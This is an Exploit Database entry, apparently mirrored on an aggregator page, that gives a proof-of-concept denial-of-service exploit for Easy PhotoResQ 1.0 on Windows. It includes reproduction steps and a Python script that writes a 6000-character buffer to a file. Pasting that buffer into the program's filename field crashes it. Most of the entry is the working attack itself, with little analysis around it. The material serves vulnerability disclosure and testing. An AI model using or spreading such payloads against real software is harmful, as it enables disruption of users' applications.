Easy PhotoResQ 1.0 – Denial Of Service (PoC)

• Exploit Database
• 16 阅读

• 作者： Gionathan Reale
  日期： 2018-08-29
• 类别：

  • dos
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/45300/

• # Exploit Title: Easy PhotoResQ 1.0 - Denial Of Service (PoC)
  # Author: Gionathan "John" Reale
  # Discovey Date: 2018-08-29
  # Homepage: https://www.hdtune.com/
  # Software Link: https://www.hdtune.com/download.html
  # Tested Version: v1.0
  # Tested on OS: Windows 7 32-bit
  # Steps to Reproduce: Run the python exploit script, it will create a new 
  # file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
  # Now start the program. Now when you are inside of the program click "File" > "Options". In the field: "Folder / filename" paste the copied content from "exploit.txt". 
  # Now click "OK" and see a crash!
  
  #!/usr/bin/python
   
  buffer = "A" * 6000
  
  payload = buffer
  try:
  f=open("exploit.txt","w")
  print "[+] Creating %s bytes evil payload.." %len(payload)
  f.write(payload)
  f.close()
  print "[+] File created!"
  except:
  print "File cannot be created"